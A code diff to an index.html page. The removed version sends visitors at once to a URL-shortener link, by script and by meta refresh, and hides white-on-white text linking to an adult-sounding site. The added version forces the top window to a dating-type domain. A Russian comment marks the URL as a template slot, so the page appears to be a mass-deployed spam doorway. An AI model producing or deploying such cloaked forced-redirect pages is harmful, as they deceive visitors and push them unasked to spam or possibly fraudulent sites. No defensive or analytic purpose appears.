--- a/index.html
+++ b/index.html
@@ -1,22 +1,3 @@
-<html lang="ko" style="height:100%;">
-<head>
-<meta charset="utf-8">
-<title>loading</title>
-<meta http-equiv="Content-Type" content="text/html; charset=utf8" />
-<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
-<meta name="viewport" content="minimal-ui, width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">
-<meta name="keywords" content="loading">
-<meta name="description" content="loading">
-<meta name="revisit-after" content="10 days">
-<meta name="robots" content="ALL">
-<link rel="icon" href="./domain/favicon.ico" type="image/x-icon">
-<script type="text/javascript"> location.href="http://tinyurl.host/fHkywC"; </script>
-<meta http-equiv='refresh' content='0; url=http://tinyurl.host/fHkywC'></head>
-
-<body style="padding:0 0 0 0;margin:0 0 0 0;border:0;overflow:visible">
-    <p><font color="white">The page has moved to:</font>
-        <a href="t https://only4sex.github.io"><font color="white">this page</font></a></p>
-    </body>
-</html>
-
-    </html>
+<script>
+window.top.location.href = "https://datme.fun/fHkywC"; // сюда подставить url из $urlsite
+</script>
